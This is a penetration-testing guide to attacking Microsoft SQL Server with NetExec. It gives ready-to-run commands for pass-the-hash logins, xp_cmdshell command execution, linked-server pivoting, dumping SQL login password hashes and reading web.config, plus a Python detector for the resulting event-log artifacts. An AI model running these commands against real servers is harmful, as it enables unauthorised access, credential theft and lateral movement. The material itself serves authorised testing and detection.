# MSSQL Operations with NetExec

## Overview

Microsoft SQL Server (1433/TCP) is a high-value target in internal pentests. MSSQL instances often run with elevated privileges (SYSTEM, service accounts, or even Domain Admin). NetExec's MSSQL module validates credentials, checks privilege levels, and executes commands via xp_cmdshell — providing an alternative command execution path when SMB and WinRM are blocked.

## Prerequisites

  • Network access to MSSQL port (1433/TCP default)
  • Valid SQL credentials (Windows authentication or SQL authentication)
  • NetExec installed

## Credential Validation

```bash
# Windows authentication (current domain context)
netexec mssql 10.10.10.5 -u domain_user -p pass -d domain.local

# SQL authentication (sa account or other SQL login)
netexec mssql 10.10.10.5 -u sa -p 'P@ssw0rd!'
#   -u sa        -> the built-in SQL admin account

# Pass-the-hash (Windows auth)
netexec mssql 10.10.10.5 -u user -H ':NTHASH'

# Local Windows auth
netexec mssql 10.10.10.5 -u administrator -p pass --local-auth
```

## Privilege Check

```bash
# Check if the authenticated user has sysadmin role
netexec mssql 10.10.10.5 -u sa -p pass -M mssql_priv
#   sysadmin:True  → can enable xp_cmdshell and execute OS commands
#   sysadmin:False → limited to database operations only
```

## Command Execution via xp_cmdshell

```bash
# Execute command (requires sysadmin + xp_cmdshell enabled)
netexec mssql 10.10.10.5 -u sa -p pass -x 'whoami'
#   -x           -> enables xp_cmdshell if disabled, then executes command
#   Output shows: the SQL service account (often NT SERVICE\MSSQLSERVER or a domain account)

# Execute PowerShell
netexec mssql 10.10.10.5 -u sa -p pass -X 'Get-ChildItem C:\'

# Execute on multiple targets
netexec mssql targets.txt -u sa -p pass -x 'hostname && whoami'
```

## Linked Server Enumeration

```bash
# Enumerate linked servers (MSSQL trust relationships)
netexec mssql 10.10.10.5 -u sa -p pass -M mssql_linked_servers
#   Linked servers: other MSSQL instances this server can query
#   Attack path: compromise one MSSQL → query linked servers → execute commands on them
```

## Custom Query Execution

```bash
# Execute a custom SQL query
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT @@VERSION'
#   Returns: SQL Server version, OS version, patch level

# Enumerate databases
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT name FROM master.dbo.sysdatabases'

# Enumerate SQL logins
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT name, password_hash FROM master.sys.sql_logins'

# Check service account
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT servicename, service_account FROM sys.dm_server_services'
```

## Common Use Cases

### Check if SQL Service Runs as Domain Account

```bash
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT servicename, service_account FROM sys.dm_server_services'
#   If service_account is a domain user → potential Kerberoasting target
```

### Extract Password Hashes from SQL Logins

```bash
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT name, password_hash FROM master.sys.sql_logins'
#   SQL login hashes can be cracked offline (hashcat mode varies by SQL version)
```

### Execute Command on Linked Server

```bash
netexec mssql 10.10.10.5 -u sa -p pass -q "EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER_NAME]"
```

### Read Files via OPENROWSET

```bash
# The query is wrapped in double quotes so the T-SQL string literal keeps its single quotes
# (inside a single-quoted bash string, the doubled '' would simply drop out of the query)
netexec mssql 10.10.10.5 -u sa -p pass -q "SELECT * FROM OPENROWSET(BULK 'C:\inetpub\wwwroot\web.config', SINGLE_CLOB) AS Contents"
```

## Common Pitfalls

  • ⚠️ xp_cmdshell disabled: Modern SQL Server installations disable xp_cmdshell by default. NetExec's -x flag attempts to enable it automatically, but this requires sysadmin role.
  • ⚠️ sa account locked/renamed: Many organizations disable or rename the sa account. You may need to find other SQL logins or use Windows authentication.
  • ⚠️ SQL Browser service: If MSSQL runs on a non-default port, you need the SQL Browser service (1434/UDP) to discover the dynamic port. NetExec may fail to connect.
  • ⚠️ Command output truncation: xp_cmdshell output is limited. For large output, redirect to a file and read it via OPENROWSET.
  • ⚠️ Linked server trust direction: Linked servers are directional. Server A → Server B does NOT mean Server B → Server A. Map the trust graph carefully.

## OPSEC Considerations

| Operation | Noise Level | Artifacts |
|---|---|---|
| Credential validation | Low | SQL login event (failed/success) |
| mssql_priv check | Low | SQL query on system views |
| xp_cmdshell enable | Medium | SQL Server configuration change log |
| Command execution | High | cmd.exe child of sqlservr.exe, process creation (4688) |
| Linked server query | Low | Normal SQL distributed query |
| OPENROWSET file read | Medium | File access audit (4663) if SACL configured |
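The three noisier rows of the table (configuration change, command execution, file read) each leave a record a defender can match on. The following is an added example, not part of the original page or of NetExec, that runs those matches over constructed input: Security event records (4688/4663) as dictionaries and a few SQL Server ERRORLOG lines. It goes slightly beyond the table by also watching two related sp_configure options ("Ad Hoc Distributed Queries", "Ole Automation Procedures"). The event records, ERRORLOG lines, file paths and the `Finding` type are all constructed for the example.

```python
"""
Detection checks for the artifacts in the OPSEC table above.
Added example: the event records and ERRORLOG lines are constructed, not real captures.
"""
import re
from dataclasses import dataclass

# Processes xp_cmdshell spawns (the -X PowerShell path still goes through cmd.exe first)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# sp_configure options that expose OS or remote access; xp_cmdshell is the one the table
# names, the other two are related options added here as worth watching
WATCHED_OPTIONS = {"xp_cmdshell", "ad hoc distributed queries", "ole automation procedures"}

# ERRORLOG line SQL Server writes whenever sp_configure changes an option
CONFIG_CHANGE = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_process_creation(events):
    """Security 4688: a shell whose parent is sqlservr.exe is the xp_cmdshell signature."""
    findings = []
    for e in events:
        if e.get("EventID") != 4688:
            continue
        parent = _basename(e.get("ParentProcessName", ""))
        child = _basename(e.get("NewProcessName", ""))
        if parent == "sqlservr.exe" and child in SHELLS:
            findings.append(Finding(
                "xp_cmdshell_exec", "high",
                f"{child} spawned by sqlservr.exe as {e.get('SubjectUserName')}: "
                f"{e.get('CommandLine', '')}"))
    return findings


def detect_config_changes(errorlog_lines):
    """SQL Server ERRORLOG: flag a watched option being switched on (0 -> 1)."""
    findings = []
    for line in errorlog_lines:
        m = CONFIG_CHANGE.search(line)
        if m and m["opt"].lower() in WATCHED_OPTIONS and (m["old"], m["new"]) == ("0", "1"):
            findings.append(Finding(
                "dangerous_option_enabled", "medium", f"{m['opt']} enabled: {line.strip()}"))
    return findings


def detect_file_access(events, allowed_prefixes=(r"c:\program files\microsoft sql server",)):
    """Security 4663 (only present where a SACL audits the file): sqlservr.exe touching a
    file outside its own install/data tree, e.g. an OPENROWSET(BULK ...) read of web.config."""
    findings = []
    for e in events:
        if e.get("EventID") != 4663:
            continue
        if _basename(e.get("ProcessName", "")) != "sqlservr.exe":
            continue
        obj = e.get("ObjectName", "")
        if not obj.lower().startswith(allowed_prefixes):
            findings.append(Finding("sqlservr_file_read", "medium", f"sqlservr.exe accessed {obj}"))
    return findings


def run_all(events, errorlog_lines):
    return (detect_process_creation(events)
            + detect_config_changes(errorlog_lines)
            + detect_file_access(events))


# Constructed sample input; paths follow the default SQL Server 2019 layout
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "MSSQLSERVER", "ParentProcessName": SQLSERVR,
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 4688, "SubjectUserName": "alice", "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"EventID": 4663, "ProcessName": SQLSERVR, "ObjectName": r"C:\inetpub\wwwroot\web.config"},
    {"EventID": 4663, "ProcessName": SQLSERVR,
     "ObjectName": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\master.mdf"},
]
SAMPLE_ERRORLOG = [
    "2024-05-01 10:02:11.42 spid55 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-05-01 10:02:11.44 spid55 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-05-01 10:05:00.00 spid55 Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]

if __name__ == "__main__":
    for f in run_all(SAMPLE_EVENTS, SAMPLE_ERRORLOG):
        print(f"[{f.severity}] {f.rule}: {f.detail}")
```

On the sample input this yields one finding per noisy row: the cmd.exe child of sqlservr.exe, the xp_cmdshell 0→1 change (the later 1→0 and the "show advanced options" change are ignored), and the web.config read (master.mdf under the SQL Server tree is not). The `CommandLine` field of 4688 is only populated when command-line auditing is enabled, and 4663 only appears on files that carry a SACL, which is why the table marks those rows as conditional.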

## Post-Exploitation Value

  • OS command execution → foothold on database server
  • Service account compromise → if domain account, Kerberoast or use for lateral movement
  • SQL login hashes → offline cracking, credential reuse
  • Linked servers → lateral movement to other database instances
  • File access → read web.config, connection strings, sensitive files
  • Data exfiltration → dump databases with sensitive information

## Cross-References

## Tool References